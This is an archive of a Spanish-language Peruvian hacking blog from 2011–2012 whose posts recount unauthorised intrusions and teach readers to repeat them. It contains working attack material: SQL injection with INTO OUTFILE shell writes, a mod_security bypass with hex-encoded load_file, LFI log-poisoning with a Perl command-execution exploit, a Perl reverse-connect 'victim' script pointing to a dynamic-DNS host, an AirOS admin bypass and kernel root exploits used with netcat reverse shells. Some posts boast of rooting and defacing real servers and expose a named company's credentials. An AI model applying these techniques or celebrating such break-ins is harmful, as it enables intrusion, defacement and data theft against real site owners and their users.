El Blog del Dr.White - Seguridad Informática Perú

Hattrick: Rooteando mas de 3 Servers en una Noche

2012-01-25T17:11:00.000-08:00

Bueno esto que les voy a relatar ahora mismo es como rootearse fácilmente 3 servidores en una noche y uno que otro como para hacer mass (esto para los defacers):

Necesitamos una web vulnerable o en mi caso tengo una shell ya uploaded como la subí...

http://xxxx.com/ --> Web de un colegio... (es VPS la info del dominio dice comprado en el año 2003).

Buscando bien tienen un blog ya en desuso donde suben al parecer cosas de deporte... busco y tiene un complemento bugged de wordpres... su bug:

Remote File Uploading...

le pido a un colega una shell xD porque la verdad en mi pc ya no se encuentran muchas shells tengo que actualizar me da una bien interesante... luego le hago el upload... año del kernel 2007 lo que si tengo son root exploits, pongo en escucha mi nc...

ncat -v -l -p 6666 me conecto de manera reversa y listo a ejecutar...

./ex y listo estamos... ahora los otros dos está mas fácil aun vamos a usar este bug que me parecio interesantisimo:

http://186.38.2.70/login.cgi?uri=/ los AirOs tienen un bugsaso que segun yo es un bug lucrativo porque ya es muy notorio y practicamente es un backd00r...

cambias la ruta login.cgi por admin.cgi/sd.css y tienes una shell como esta:

para que mas diganme ustedes puden subir todo lo que quieran y tendrán servidores owned como quieran... encontrarlos es facilisisisisisisisimo yo encontré por lo menos 20 vulnerables en una noche... cuantos encuentran ustedes...

Saludos,
Dr.White

Provocando Pantalla Azul a travéz de Safari

2012-01-25T17:01:00.000-08:00

Bueno para que mentir xD me dio pereza levantar una virtual y lo prové en mi maquina normal... Funciona Así...

Vas a tu hosting y subes un archivo llamado cualquiernombre.html y dentro le pones algo tan simple como esto:

<iframe height='18082563'></iframe>

no tube tiempo de probar con otras cantidades en el height pero si lo probe poner en la etiqueta img pero no funcionó... sirve para que? en realidad para nada mas que trollear salvo que ustedes le puedan dar un uso un poco mas util que yo :)

Datos del que lo encontró:

# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil

yo probé también en win 7 en 64 bits...

Saludos,
Dr.White

Conexion Inversa Orientado a Malware

2012-01-11T09:11:00.000-08:00

Escribo esto para explicarles masomenos como funcionan algunos malwares que se desarrollan ahora.

Lo que hacen es que las personas se conecten a la PC del Atacante y no El Atacante a la PC de la Víctima.

Set My PC:

Vamos a hacer lo siguiente, vamos a http://www.no-ip.com/ y nos vamos a registrar luego nos logueamos y vamos a ir a la pestaña Add a Host del Menu.

En El Host Name Ponemos SeguridadBlanca o bueno lo que deseen en este caso será SeguridadBlanca y al lado seleccionan lo que quieren yo escogí no-ip.org.

En la opcion de abajo donde dice: Host Type ponganlo en DNS Host (A) en la ip dejenla como está. Luego denle click al Boton Create Host.

Ahora Deben de Bajarse el Client de No-IP:

Download desde aquí yo en este caso estoy booteando mi win7 asi que me bajo la version para windows :)

Ahora me la bajo instalo todo y cuando abro me pide que me loguee, me logueo con mi cuenta de no-ip y aparecerá SeguridadBlanca.no-ip.org seleccionan el checkbox y ponen Save... luego les deben de salir tres checks:

Client ID
Updating
IP

si no te salen los tres checks es porque hay algo mal xD no funcionará muy bien si sales por proxy o estás en la oficina donde te bloquean cosas.

Ahora lo anterior de Setiar el no-ip es por dos motivos: El primero es porque nuestra ip cambia constantemente por lo menos en mi pais es así entonces para no tener que estar cambiando y cambiando pues usamos el no-ip que nos mantiene una ip seguridadblanca.no-ip.org y el otro motivo es para un tema de ocultar nuestra ip.

Ahora vamos a crear la conexion inversa.

use IO::Socket;
my $sock = new IO::Socket::INET (
PeerAddr => 'seguridadblanca.no-ip.org',
PeerPort => '90',
Proto => 'tcp',
);
die "No se creo el socket: $!\n" unless $sock;
print $sock "Soy tu Victima\n";
close($sock);

Bueno con eso se nos conecta la victima :)

aqui tambien tienen un chat en visual basic basado en sockets que pueden usar... adapten los sockets nomas bueno y ese code de perl es solo para hacer la conexion luego nuestro server debe correr en el puerto 90 y genial tenemos a las victimas conectadas a nosotros.

Saludos,
Camilo G.

Arachni Open Source Security Scanner

2012-01-11T08:50:00.000-08:00

Arachni es un "nuevo" FrameWork Open Source Desarrollado en Ruby Para Analizar Bugs en Websites y asi ayudar a que tu web deje de ser vulnerable.

Su funcionamiento básicamente es que hace una especie de SiteMap y luego basado en las url obtenidas comienza a hacer un escaneo, la velocidad es normal ni rápido ni lento y no es tan noob friendly.

Corre en Linux y para Windows viene con librerias Cygwin.

Para ver mas información puedes consultar aquí.

Descarga:

Linux

Windows

Desde que me desperté lo anduve provando en localhost en linux, y funciona bien lo unico malo es que a veces como que se lentejea o si el bug hace redirección lo caga al scanner tambien.

Saludos,
Dr.White

Absinthe Blind SQL Injection Tool

2012-01-08T08:21:00.000-08:00

Sinceramente me cuesta demaciado inyectar sql blind principalmente por que soy desesperado y eso de estar esperando no va conmigo, asi que bueno encontré esta tool en un foro y me parecio bien interesante la prové con una web de un amigo que tiene blind y la verdad es que el scanner es un poco lento pero funciona bien.

Caracteristicas:

- Totalmente automático, no encuentra la sqli tu se la debes dar.
- Inyecta MSsql, Postgres Sql y Oracle.
- Puedes editar el query.
- Soporta proxy.
- GUI.
- Algunas Más.

Mi Experiencia: Yo la prové en una blind en la web de un amigo, era MySql, aun no he tenido la oportunidad de provarlos con las otras bds pero en mysql corrió perfectamente.

Descarga

Informacion y Documentacion

Te quedó chico el hydra? Patator!

2012-01-08T07:18:00.000-08:00

Patator es un nuevo brute forcer que basa sus características en los errores y complejidades que tienen herramientas como el hydra, el medusa, el brutus, el ncrack y muchas otras herramientas, quien una vez no quizo hacer una herramienta de bruteforce que se le adapte a sus necesidades... este tipo del Patator la ha desarrollado para ti.

Desventajas de algunas tools:

- Lentas.
- Dan Resultados Falsos.
- No Funcionan.
- Son muy simples.

Ventajas del Patator:

- Multithread (Es rápido)
- Sus Resultados realmente se basan en codigo.
- Muchos mas.

Sus Características:

ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-force the password of encrypted ZIP files
keystore_pass : Brute-force the password of Java keystore files

Las que he provado:

Brute-Force SSH
Brute-Force FTP
Brute-Force Telnet
Brute-Force Mysql

Lo que he notado de la tool, no es tanto que sea muy diferente a las otras, lo que he visto es que el código, escrito en python, está mas limpio y además, es más rapido que cualquier otro que haya provado.

Descarga
Mas Información

Saludos,
Dr.White

Nuevas Vibras para SeguridadBlanca

2012-01-08T06:36:00.000-08:00

Bueno desde el día de hoy comenzaré a dedicarle mas tiempo al blog no solo para poner tutoriales hechos por mi sino también artículos de interes que sé que los podrán necesitar en algún momento.

Saludos,
Dr.White

Sql Injection en ESET LATINOAMERICA

2012-01-04T17:25:00.000-08:00

Bueno Resulta que hace tiempo yo trabajaba como freelance en una blog de malware me pagaban 100$ al mes ademas de una recompensa si es que uno de mis posts era el favorito del mes... y en una de las veces que decidi hacerle un escaneo con las manos como a mi me gusta yo no soy mucho de tools por que siempre la creatividad humana será mejor que la de un bot pero bueno analizo y encontré que habia una sqlinjection caletasa el cms que usabamos era un sistema de noticias no recuerdo cual tuneado por un programador de php que estaba mucho tiempo atras en el website la sqli estaba en el buscador... era simple tan facil como una comilla... el bug es parecidisimo al que encontré en ESET, un video donde les muestro que habia una sqli en eset, confirme que se podia hacer union y select. esto se puede reparar con un mysqlscapestrings a porcierto no le pongan muchos filtros a su web por que sino se van a ver puros backslash(\) por toda su web como la web de una empresa peruana que es tan insegura de como filtrar que filtra hasta los echo...

Saludos,
Dr.White

Analizando Gusanito Facebook

2012-01-04T07:35:00.000-08:00

Un amigo me pega en el muro modelos se les sale la teta y que no se que y yo WTF!!???

Entro y me sale esta hermosura:

Lo Mas hermosos de esto es que el que lo programó fue bien astuto por que si es un plugin! pongo ver el codigo fuente y veo esto:

<center><p>Instala el Plugin para reproducir el video</p></center>

<div align="left" style="width:550px;height:437px;overflow:hidden;" id="videitos">

                   <center> <div id="liframe"><iframe id="change" width="500" src="http://xxxxxx.com/xxxx.html" height="300" scrolling="no" frameborder="0"></iframe></div></center>

Viendo la fuente del archivo xxxx.html encontré esto:

<script>

                var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;

                var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

                function instalar(){

                    if (is_chrome){

                        window.open("http://xxxxx.com/plugin.crx");

                    } else if(is_firefox){

                        var params = {

                            "Youtube Extension": {

                                URL: "http://xxxxx.com/plugin.xpi",

                                toString: function () { return this.URL; }

                            }

                        };

                        InstallTrigger.install(params);

                    } else{

                         window.open("http://www.google.com/chrome/eula.html");

                    }

                }

             </script>

Quise ir un poco mas hayá y levanté mi máquina virtual... instalé mi google chrome y a infectarnos se ha dicho...

Luego fui a:

C:\Users\1337test\AppData\Local\Google\Chrome\User Data\Default\Extensions

Busqué la carpeta del plugin y encontré 5 Archivos:

go.js
icon16.png
icon48.png
icon128.png
manifest.json

En el go.js encontramos:

loadScript_YOU();

function loadScript_YOU() {

if ('https:' == document.location.protocol) return false;

var s = document.createElement('script');

s.setAttribute("type","text/javascript");

s.setAttribute("src", "http://xxxxxxx.com/script.js");

var head=document.getElementsByTagName("head")[0];

if( head==null) return false;

head.appendChild(s);

return true;

}

En el manifest:

{

   "content_scripts": [ {

      "all_frames": true,

      "js": [ "go.js" ],

      "matches": [ "\u003Call_urls\u003E" ]

   } ],

   "description": "Reproduce videos online alojados youtube, m\u00E1s r\u00E1pido y eficiente",

   "icons": {

      "128": "icon128.png",

      "16": "icon16.png",

      "48": "icon48.png"

   },

   "key": "xxxxxx",

   "name": "Extension YouTube",

   "permissions": [ "*://*/*" ],

   "update_url": "xxxxxxx",

   "version": "1.3.0"

}

Ahora lo importante en el go.js encontramos esto:

s.setAttribute("src", "http://xxxxxxx.com/script.js");

vamos a ver que hay dentro:

(Esto estaba encriptado ahora lo pongo desencriptado):

function addScript(_0xb530x2) {

    var _0xb530x3 = document['createElement']('script');

    _0xb530x3['setAttribute']('type', 'text/javascript');

    _0xb530x3['setAttribute']('src', _0xb530x2);

    var _0xb530x4 = document['getElementsByTagName']('script')[0];

    if (_0xb530x4 == null) {

        return false;

    };

    _0xb530x4['appendChild'](_0xb530x3);

    return true;

};

addScript('http://xxxxxxxxx.com/ex.js');

Ahora vamos a ver que hay en:

addScript('http://xxxxxxxxx.com/ex.js');

Y lo que habia era...

Bueno no voy a poner el codigo porque es su chamba pes su codigo ellos lo programaron está ofuscado aparte pero bueno lo que hace es por metodo post lo publica en el muro de tus amigos diciendo:

var comment = "Estas chichas se pasan!!! " + etiquetas;

Bueno como se desinfectan? vayan todo para atras.

Saludos,
Dr.White

Inosentes xD

2011-12-29T06:32:00.000-08:00

Ayer Fue el día de los inosentes y puse el post de hacked por los anonymous -.- no me hackearon en verdad... Varios en las redes sociales me preguntaron si el hackeo fue real xD pues no fue broma por el día de los inosentes... como varios que tienen blogs de seguridad informatica lo hacen.

Saludos,
Dr.White xD

PWNED By Anonymous Peru

2011-12-28T12:19:00.001-08:00

No Perdonamos No olvidamos Esperanos Te Hackeamos Dr.White

inosentes

Full Access Mediante LFI

2011-12-10T12:57:00.000-08:00

Hablando con un colega me dijo que me pagaría por encontrarle un error a un .php lo encontré sin embargo estaba dentro del panel asi que no se podría entrar facilmente... ya que no habia forma de bypass al login entonces me mostró un LFI que tenia en la web dije bueno haber como le hacemos... comenzé a darle al LFI para sacar el config.php y nada estaba bloqueada esa wa... la inyeccion era algo asi:

http://malicioussub.domain.com/tech/protocolo/algundirmas/funcxxx?ts=../../../../../../../../../../../etc/passwd

Bueno hasta el momento todo iva bien saque el passwd y nada cdsm no habia nada interesante un solo usuario bueno segui intentando y yo siempre saco archivos .php ya sea el index o lo que fuese y de ahi saco el config de ahí voy escalando pero en este caso no se podían sacar los .php aun no estoy seguro por que entonces busqué y dije ya se por medio del phpmyadmin voy a intentar sacar shell haciendo into_outfile o algo por ahi intenté entrar con user: sa y password: sa y nada csm dificil explotar teniendo en cuenta que todo lo que tenía era un lfi y ensima ni sacar los archivos podía me encontré con un archivo .log y ahi me frikie xD mi ip estaba en los logs provando el sa y sa entonces dije wait a minute... yo recuerdo esto:

intentaré poner algo en el archivo .log...

con mi popular y muy usado Live Http Headers cambie mi user-agent a entonces aparecio en el log pero... por que siempre hay un pero no se ejecutó una busqueda rápida en mis recuerdos me hizo acordar un LFI que exploté hace tiempo en el que usaba eso mismo en el proc/self/environ entonces dije a cierto a ver cambie la url en el navegador puse el mismo user-agent: http://malicioussub.domain.com/tech/protocolo/algundirmas/funcxxx?ts=../../../../../../../../../../../proc/self/environ

Mother of my fucking god me mostraba un resultado distinto:

HTTP_HOST=sub.domaimn.com HTTP_REFERER=http://subfucking.domain.com/ HTTP_USER_AGENT= PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron

no salia el user agent visible... procedí a verificar si había subido y si si subio la shell, cuando le comenté del caso a mi colega me dijo que era una buena manera de subir que la conocia pero no se le ocurrio y me hizo acordar que algo parecido se puede hacer con el archivo ../../../../../../../etc/httpd/logs/error_log me encontré también con este exploit:

#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path.$code." HTTP/1.1
";
print $socket "User-Agent: ".$code."
";
print $socket "Host: ".$site."
";
print $socket "Connection: close

";
close($socket);
print "
Code $code sucssefully injected in $log
";

print "
Type command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1
";
print $socket "Host: ".$site."
";
print $socket "Accept: */*
";
print $socket "Connection: close

";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}

está muy básico sin embargo ahi se los pongo cambien la victim.com el folder y la url del folder y del log xD y en el code la idea es que pongan el system() o passthru() bueno la cosa es como le subí la shell ahi tienen una buena opción de que hacer con un LFI en el caso que los .php estén bloqueados.

Saludos,
Dr.White

Pwned AnonymousPeru.com

2011-11-21T13:58:00.000-08:00

Bueno pues lei en el periódico la noticia de un leak de un mail que decia algo sobre nuestra alcaldeza entonces dije a ver si han publicado algo en su página de facebook... me fijé y dentro de alguna de esas webs publicadas por ellos estaba http://anonymousperu.com entonces dije OMG tienen su propio dominio ahora si vamos a ver que tan buenos son... entonces les hago unos scaneos simples no, me doy cuenta que estan en un hosting no en vps le tiro Reverse DNS

Busco hasta encontrar esto...

http://www.cnblacklist.com/single.php?post_ID='

Entonces comienzo a inyectar intentado sacar user y pass y me banean la IP U_U y me comenzaron a banear cada vez que inyectaba, mi amigo de ecuador A.A me ayuda se loguea en http://www.cnblacklist.com/admin/login.php y hay un upload donde se pueden subir supuestamente archivos ".jpg" pero bypasseando se subio un .php

URL: http://cnblacklist.com//uploads/201111/xd.php

Me Fui a otro dir y subi una shell que me acomoda mas...

http://cnblacklist.com/tr0ll.jpg.php

Hice mi Conexion inversa con el NetCat...

Version: 2.6.32-71.29.1.el6.x86_64

Local Root Expl0it: Si.

Me pongo como root navego rápidamente por los direcorio que habian en /home/ hasta que encuentro... uno que tiene el dir:

/lightIRC/

dije este es... estoy subiendo un archivo de Owned y se me desconecta el Netcat...

Las shells no estaban... y yo Dije Hijo de pu... el site del chino tampoco entraba...

http://cnblacklist.com/

Error 403... OMG que paso entre en desesperacion... me quería morir comenzé a poner estatus de odio a los chinos, tweets y mas cosas xD entonces... me llego este mail...

Hola,

Has publicado un mensaje en el muro que infringe nuestras Condiciones de uso. Entre otras cosas, los comentarios ofensivos, amenazantes u obscenos no están permitidos. También retiramos los que atacan a individuos o grupos de personas concretos, o que anuncian un producto o servicio. El mal uso continuado de las funciones de Facebook puede provocar la inhabilitación de tu cuenta. Si tienes preguntas, visita la siguiente página de preguntas frecuentes:

El equipo de Facebook

xD me calmé... y de pronto dije a ver si se subio...

www.anonymousperu.com/pwned.html

Y...

Si se subio...

Anonymous Perú Pwned... El Archivo despues de como 5 minutos comenzó a ir a http://redirect.main-hosting.com/error404.php/2

Saludos Anonymous Yo no los perdono por dejar tan mal la seguridad informática peruana.

gr33tz: SDM, AA, Wirito, 45p1d4_16n15, Ar3sw0rmed, Real Peruvian Elite And Peruvian Cyber Security.

Mision Cumplida.

Saludos,
Dr.White

Archive.Org Xssed

2011-11-18T15:08:00.000-08:00

Bueno estaba recordando mis viejos tiempos cuando tenia unos sites de cosas relacionadas a niñadas y entonces dije nah no creo que sean vulns a Xss entonces me perdi buscando hasta que encontré, el bug lo encontre ya hace buen tiempo hoy me atrevo a hacer el video :)

Saludos,
Dr.White

MercadoLibre Argentina Xssed

2011-11-18T15:03:00.000-08:00

Bueno vi su ad y dije usaran adsense en algun momento entonces me puse a fijar hasta que llegué a... luego no pude hacer saltar el alert le dije a DarkStone...

Web: http://smartad.mercadolibre.com.ar/

Reportado: no se como reportar ahi U_U

Saludos,
Dr.White

SonyEricsson Xssed

2011-11-17T06:01:00.000-08:00

No es que sea un fanatico del Xss U_U se puede puede robar las cookies de developers ya hice la prueba...

Saludos,
Dr.White

Yahoo Xssed

2011-11-10T08:23:00.000-08:00

A ver el Xss se encuentra en el archivo SWF que usan para conectarse al chat de yahoo no esta en el dominio.com se encuentra en yimg.com como decir fbcdn.net en facebook, bueno en realidad si lo veo critico por que en mi caso se encuentra como un OnClick pero sin embargo puedo hacer un Onmouseover y la cosa cambia :) o fingir una descarga de un addon para usar el chat, etc, etc, etc.

El Bug originalmente fue encontrado por "AA" pero solo se podia en IE yo lo hice funcionar en FF y Chrome.

Video:

Saludos,
Dr.White

Bypassing Xss Filters By Camilo Galdos A.k.A Dr.White

2011-11-07T11:02:00.001-08:00

Lima hack 2011

View more presentations from Dedalo-SB

LimaHack 2011 Camilo from Camilo Security on Vimeo.

LimaHack 2011 III Camilo from Camilo Security on Vimeo.

Saludos,
Dr.White

Root +1000 Sites (Anécdota + Tuto)

2011-10-22T06:21:00.000-07:00

Estaba recordando mis épocas de niño cuando jugaba habbohotel y bueno dije voy a buscar una de esas copias que ahora les llaman holo, resulta que entre a un sitio y tenia un sistema de saber cuando un habbo estaba online y salia en verdesito comenze a analizar y vi que el sistema de online se hacia con dos variables:

http://holosdeexample.com/estado.php?holo=123&port=1232

hasta ahora habia provado sus variables y ninguna bugged y dije a ver el ultimo intento y cuando pongo una comilla despues del port=1232...

WARNING!!

Tenia Sql Injection comenze a inyectar y a estas alturas sufro de pereza al inyectar todo a mano pero era una base de datos media grandesita y fue tentador despues de unas cuantas comas llegue al numero de tablas from schema bla bla bla y me doy con la sorpresa de que ningun usuario tiene privilegios... de admin ni mod ni nada parecido tenian un foro y un wordpress entonces dije voy a intentar saltar a las tablas de wordpress y smf y nada de nada y ahi si me entro la colera y un usuario del sistema su clave en md5 estaba cuando la puse en google entre comenze a buscar bugs a nivel de panel y me encontre con un lfi pero parece que tenia un filtro la variable por que jalaba imagenes y cuando intentaba jalar un .php no me dejaba entonces ya arto y sin ganas de seguir dije OMG y si intento loadfile y into outfile y entonces doy con que si se podia escribi una linda shell subi ya tenia mi shell :)

http://holosdeexample.com/estado.php?holo=123&port=-1232+UNION+SELECT+0,1,2,3,4,'' INTO OUTFILE '/htdocs/www/holos/logholo.php',6,7,8,9+FROM+users+--+

sin restriccion alguna con todas las comodidades en la inyeccion como pueden ver... el server totalmente mal configurado me permitio hacer un wget sin problemas luego ya estaba cerca a todo, hice mi reverse connect para ver todo mas de cerca desde mi PC y de pronto...

El server tenia mas de 1000 webs hosteadas dentro cuando lo vi no lo podia creer la emocion crecio mas en mis ganas de poder rootear entonces vi la version que salia en mi shell y vi 2.6.18.... y era del 2009 una busqueda rápida de google nisiquiera tube que preguntarle a mis amigos juackerosos si tenian root exploit fue simple la busqueda en google: Local Root Exploit 2.6.18 2009 y di con elexploit compilarlo y ejecutarlo... mas me tarde en buscar un bug en la web que nada si hubiese sido un black hat hubiese podido hacer mas de 1000 defaces en 5 minutos hay tool que hacen esto nunca las he provado pero aqui tienen una como ejemplo, sino ustedes pueden hacer las suyas si quiren no pero yo no soy defacer asi que una vez que entre me senti la persona mas realizada del mundo xD la verdad que es la primera vez que rooteaba un server tan grande... por eso puse el post por la emocion que he sentido xD no rebelo ningun nombre para evitar problemas pero el hosting es masomenos conocido a nivel de españa asi que ya ven ustedes si lo quieren encontrar ;)

no tengo capturas de pantalla por que el ataque lo hice ya hace como dos o tres semanas, la lista de sitios se los pase a algunos de mi msn asi que saben que sites son :) si me tienen en msn la pueden pedir normal, no tome captura en ningun momento y ya no tengo root asi que la historia queda para aquellos que crean ;)

Saludos,
Dr.White

Dr.White En El LimaHack!

2011-10-11T08:42:00.000-07:00

Mande un paper sobre como bypassear filtros de Xss y fui aceptado, en la exposicion enseñaré como funcionan los xss, como parchar los xss, como robar cuentas por medio de Xss, como es la diferencia entre un xss normal y uno persistente y mucho mas.

En la exposicion también sacaré a la luz xss en webs con millones de visitas diarias a las cuales se les podría redireccionar o robar las cookies, entre esas webs el visitadisimo Facebook.

Espero que todos puedan ir a la Charla en el Limahack el Registro me parece que aun no está abierto pero si lo estará dentro de unas horas o dias.

Para ver las exposiciones y expositores, El Programa del LimaHack en General Consulten Este Link

Nos Vemos!

Saludos,
Dr.White

DLL Hijacking (Simple Explain)

2011-10-09T07:51:00.000-07:00

Estaba buscando la manera de entrar a la PC de una persona y no encontraba como y recordaba que habia una cosa con los DLLs y dije mmm buscare y encontre lo que se conocia como dll hijacking la verdad no me servia mucho si no tengo acceso a la otra pc pero si me parecio muy interesante si lo usamos de manera creativa...

En que consiste?

- Sustituir los dll de una aplicacion por otro con el mismo nombre y si la aplicacion los llama con LoadLibrary.

Bueno basicamente funciona de esta manera:

Programa: Dedalo Inyecter V1.0

Type: .exe

Dlls: ded.dll friki.dll god.dll socket.dll

Mi programa lo instalo y esta en:

c:\hacking\soymuyjuackeroso\tools\inyector\dedaloinyecter\

cuando instale mi programa los dlls todo se guardaron en el system32 y en las carpetas dll del winbugs...

Ahora vamos a aplicar este ataque...

como sabemos programar en C vamos a hacer un DLL que haga algo tan simple como abrir un messagebox y que diga OWNED nada mas. y lo vamos a llamar igual que cualquiera de los dlls que usa mi aplicacion.

usaremos god.dll hacemos nuestro dll y lo nombramos exactamente igual god.dll... ya estamos cerca lo copiamos y lo pegamos en: c:\hacking\soymuyjuackeroso\tools\inyector\dedaloinyecter\ es decir la carpeta donde está el programa y cuando lo abrimos en el momento de cargar el dll god no carga el que está en el system32 sino que carga el que está en su carpeta o_o entonces cuando lo abres sale un message box... O si hemos hackeado :D.

Les soy sincero aun me estoy familiarizando con el bug pero la verdad me parece muy interesante la manera de como explotar... aqui les dejo dos links uno de dll hijacking en nmap y otro en Firefox 7.

Aun estoy estudiando el tema aun insisto que estoy investigandolo para poder poner luego un tutorial mejor o por que no encontrar dll hijacking en algun soft ;)

Referencias y t00ls

he provado los dos bugs el de nmap y el de firefox ambos funcionan pueden probar o intentar con otro softs a ver que sale ;)

Saludos,
Dr.White

Sacando BDs sin Root

2011-10-06T10:04:00.000-07:00

viendo un caso muy comun cuando no tenemos root expl0it para cierto Kernel, para aquellos que coleccionan BDs o necesitan sacar información y no tienen root expl0it esto les servir...

Primer Paso Encontrar un Bug...:

http://myowning.com/ fuck puro html no hay bug mmm reverse DNS y...

http://xxxxxx.com/noticia.php?id=12599' <--- Sql Injection :)

mmm inyectando... pero no sirve load_file CDSM y ahora... mmm cierto hay usuarios a ver Select...

Bien tenemos las password ahora al panel... mmm un uploader... si hay para subir avatar a ver vamos a subir shell... y....... :( no cdsm las renombra a jpg fuck! mmm otra forma mmm un uploader mas para subir imagenes en el post de la noticia y.... si! vamoooosssss subio la shell!!!!!!

Vamos a hacer reverse connect con nuestro NetCat para ejecutar el local root expl0it :)

Vemos que ya estamos conectados :) ahora si vemos en la shell la version del kernel y buscando en nuestro repertorio...??

Ni mier... no hay ese local root exploit T.T y ahora? que hacemos CDSM como nosotros no somos defacers xD somos aficionados a la seguridad y por ahi queremos nada mas su base de datos como para tenerla, mi amigo Ar3sW0rm3d al igual que yo es fanático de las BDS asi que cerramos nuestro nc y regresamos a la shell... vamos a ir al directorio de las noticias y vamos a buscar su config.php diria que lo busquemos desde el netcat pero para que tener mas cosas abiertas? xD

y aqui esta el Config.php

<?php
$host = "localhost";
$username = "root";
$password = "xxx";
$dbname = "xxxx";

$cur = "xxx";
$sitemail = x@xx.com';

$twitter = ""; //Twitter account

$language = 'es';
?>

Ahora nos vamos a la pestana de SQL de nuestra shell y connect.

Hacemos un backup download con la shell y ya tenemos su BD sin ser root ;) asi podemos hacer con todos los sitios ;) ya que podemos leer pero no escribir... o almenos esa será la situacion a la que nos enfrentamos obviamente nosotros queriamos entrar a dominar todo el server y bajarnos todo mas facil pero como no hay local root asi será una manera facil y rapida de sacar las BDs.

Saludos
Dr.White

LimaHack 2011 CfP

2011-09-15T08:57:00.000-07:00

Arranca el Call For Papers para el LimaHack 2011...

Para más detalles visita: http://limahack.com/

Estaré presente aun no se si como expositor pero si iré a ver a toda la gente del Hackig Peruano en especial a los anonymous jajajajaja los veo.

Bypass Mod_Security ASP

2011-07-20T11:48:00.001-07:00

No voy a usar un ejemplo real esta vez porque he tenido unos problemas pero igual les voy a mostrar casi exactamente como funciona este bypass...

tenemos nuestro periodico en línea...

http://xxx.com/noticias.asp?id=12

santo cielo a ver que pasa si pongo comilla

http://xxx.com/noticias.asp?id=12'

mmm bueno no paso nada a ver si pongo un UNION SELECT

http://xxx.com/noticias.asp?id=-1+UNION+SELECT+0--

OMG error pero no de mysql sino es mas bien 403...

entonces que fue? vamos a ver... les explico mod_security lo que hace es con un algoritmo detectar lo que para el son ataques de sql injection... no me pregunten como funciona el algoritmo porque la verdad no estoy seguro como es el funcionamiento... pero... no es muy exacto... veamos lo que hace es filtrar la variable...

id= -1 + UNION + SELECT + 0 --

lo que vamos a hacer es descomponerla mita mita =)

http://xxx.com/noticias.asp?id=-1&id=+UNION+SELECT&id=+0--

OMG sigue saliendo error a ver entonces tenemos que ofuscar un poco los comandos SQL para que no vote error de la siguiente manera

http://xxx.com/noticias.asp?id=-1&id=+UN/**/ION+SE/**/LECT&id=+0--

OMG ya no mando error lo podemos ver =) fuck yeah... ahora a buscar mas tablas...

http://xxx.com/noticias.asp?id=-1&id=+UN/**/ION+SE/**/LECT&id=+0+1,2,3,4,5,6,7+FR/**/OM users--

ahora con esto activado y un poco de hex podemos sacar de todo...

../../../etc/passwd ahi ese es el archivo que queremos sacar...

http://xxx.com/noticias.asp?id=-1&id=+UN/**/ION+SE/**/LECT&id=+0+1,2,load_file(0x2e2e2f2e2e2f2e2e2f6574632f706173737764),4,5,6,7+FR/**/OM users--

todo con ese bypass lo puse porque ayer me encontré con uno de estos y lo quería compartir... es bien simple como ven y bien util, puden sacar todos los datos que quieran es igual que en cualquier sql injection normal... hay variantes del bypass si no funciona con UN/**/ION y asi... fijense ustedes como puden bypassear cambiando en mayusculas y minusculas el lugar de los comentarios y mucho mas...

Suerte :)

Vilsol (IT Security) Analizandolos...

2011-07-15T12:03:00.000-07:00

El era la guía para pelear contra Anonymous...

Bueno yo escuché hablar por la tele al Super IT Security Expert Alexis Villagra de Vilsol sobre los ataques de Anonymous al Gobierno peruano explico cosas que a muchos les habrá sido dificil entender... para mi este hombre no es mas que un pobre atarantador... con lo que voy a poner aquí no sean escandalosos no quiero que se haga algo mas grande de lo que debe ser solo demostrar que los que mas hablan son los que menos hacen y los que mas hacen menos hablamos...

http://www.youtube.com/watch?v=HfJPpEBJOp8 ese es uno de los videos en los que habla... se le ve muy experimentado pero... y su seguridad? donde queda en su web?

http://www.vilsol.com es su pagina web en la que ofrece servicios de seguridad diciendo ser su empresa excelente con la seguridad pero señor Alexis como lo contrato si usted tiene errores garrafales de seguridad en su página web...

Le recuerdo señor que este tipo de archivos no debería ser público:

http://www.vilsol.com/info.php

Le recuerdo señor que no es bueno poner Malware en su hosting...

http://www.vilsol.com/_private/

archivo: bot.exe

publicaría el codigo fuente pero eso sería irrumpir en contra de "su software"...

le recuerdo señor... que existe algo llamado htaccess para que no se listen sus directorios...

http://www.vilsol.com/demos/

Le recuerdo señor que la base de datos... son un elemento privado que debe ser CIFRADO y que debe proteger a sus clientes...

http://www.vilsol.com/sql/localhost.sql <-- este fue el que mas me impacto...

señor si quisiera podría hacer publico su correo electrónico...

INSERT INTO usuario (login, password, secciones, usuario_nombre, usuario_apellidos, usuario_celular, usuario_rpm, usuario_email)

('camila', 'vilsol', 'a,b,c,d,e,f,g,h,i,j,k,l,n,o,p,q,r', 'Camila', 'Arana', '-', '-', 'ventas@vilsol.com'),

cual creen que será la clave de su correo electronico?

señor sus includes?

http://www.vilsol.com/inc/

